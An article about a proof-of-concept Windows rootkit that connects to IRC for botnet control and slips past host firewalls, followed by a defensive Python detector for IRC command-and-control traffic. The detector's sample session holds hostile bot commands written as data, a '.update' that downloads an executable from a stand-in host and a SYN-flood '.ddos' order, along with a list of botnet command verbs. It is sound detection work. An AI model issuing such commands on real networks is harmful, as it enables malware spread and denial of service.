Rootkits Connect to IRC Directly

Rootkits for Windows are currently the ‘hot’ item among those who want to keep their activities hidden on the computers of unwitting others.

Rootkits hide their own processes (and usually their files and registry keys as well) from the user, which makes the rootkit hard to detect, let alone remove. But a rootkit by itself is rarely enough to accomplish what the attacker wants. Features such as running an FTP server or connecting to IRC to receive commands are normally provided by separate software, and that software can be detected, which in turn reveals that a rootkit is probably installed.

A European student has now written a proof of concept showing that a rootkit can include the functionality to join an IRC channel itself. IRC channels are commonly used to control botnets; the commands typically include updating the bot software, launching DDoS attacks, infecting new machines and sending spam.

One effect of placing this functionality at the level a rootkit runs at is stealth. Not only is the process itself hard to detect, certain types of firewalls cannot see the traffic either: a host firewall that inspects connections at the application or socket layer never sees packets that a kernel-mode component injects further down the network stack. Norton’s firewall is given as a popular example that can be bypassed this way.
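A host firewall that is bypassed in this way says nothing about the wire: the IRC session still crosses the network and can be inspected there. The following is an added example, not code from the article or from the proof of concept it describes. It parses IRC protocol lines (the prefix / command / parameters layout of RFC 1459) from a constructed, assumed capture of a bot joining a channel and flags the patterns the article lists: a bot-style nickname, a keyed channel join, and operator commands such as update and DDoS. The command verbs and the nickname format are assumptions an analyst would tune to the malware at hand.

```python
"""Parse IRC lines from a network capture and flag botnet-C2 patterns.

Added example; not the article's or the referenced proof of concept's code.
The sample session and the C2 verb list below are constructed assumptions.
"""
import re
from dataclasses import dataclass, field


@dataclass
class IrcMessage:
    prefix: str
    command: str
    params: list = field(default_factory=list)


def parse_irc_line(line: str) -> IrcMessage:
    """Split one IRC line into prefix, command and params (RFC 1459 layout).

    An optional leading ':prefix ' names the sender; a ' :' starts the
    trailing parameter, which may contain spaces (the message text).
    """
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command = parts[0].upper() if parts else ""
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return IrcMessage(prefix, command, params)


# Assumed operator command verbs (article: update, DDoS, infect, spam).
C2_VERBS = {"ddos", "update", "download", "scan", "spread", "spam"}

# Assumed bot nickname format, e.g. "[USA|XP]4829173": region|OS tag plus digits.
BOT_NICK_RE = re.compile(r"^\[[A-Za-z]{2,4}\|[^\]]+\]\d{4,}$")


def c2_indicators(lines):
    """Return (reason, raw_line) pairs for lines that look like bot C2."""
    hits = []
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg.command == "NICK" and msg.params and BOT_NICK_RE.match(msg.params[0]):
            hits.append(("bot-style nick", raw))
        elif msg.command == "JOIN" and len(msg.params) >= 2:
            # A second JOIN parameter is a channel key; C2 channels are often keyed.
            hits.append(("join with channel key", raw))
        elif msg.command == "PRIVMSG" and len(msg.params) >= 2:
            text = msg.params[-1]
            m = re.match(r"^[.!](\w+)", text)
            if m and m.group(1).lower() in C2_VERBS:
                hits.append((f"command verb .{m.group(1)}", raw))
    return hits


# Constructed sample session: a bot registering, joining a keyed channel and
# receiving two operator commands, plus benign chatter and a server PING.
SAMPLE_SESSION = [
    "NICK [USA|XP]4829173",
    "USER x 0 * :x",
    ":irc.example.net 001 [USA|XP]4829173 :Welcome",
    "JOIN #b0tz s3cr3t",
    ":op!op@host PRIVMSG #b0tz :.update http://example.invalid/bot.exe",
    ":op!op@host PRIVMSG #b0tz :.ddos syn 192.0.2.10 80 600",
    ":friend!f@host PRIVMSG #b0tz :hello everyone",
    "PING :irc.example.net",
]


if __name__ == "__main__":
    for reason, raw in c2_indicators(SAMPLE_SESSION):
        print(f"{reason:24} {raw}")
```

Run against the constructed session it reports four lines: the nickname, the keyed join and the two operator commands, while the friendly greeting and the PING pass. Because the indicators are keyed on protocol structure rather than on a host-side process list, they hold whether the IRC client is a separate bot executable or code running inside the rootkit itself.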
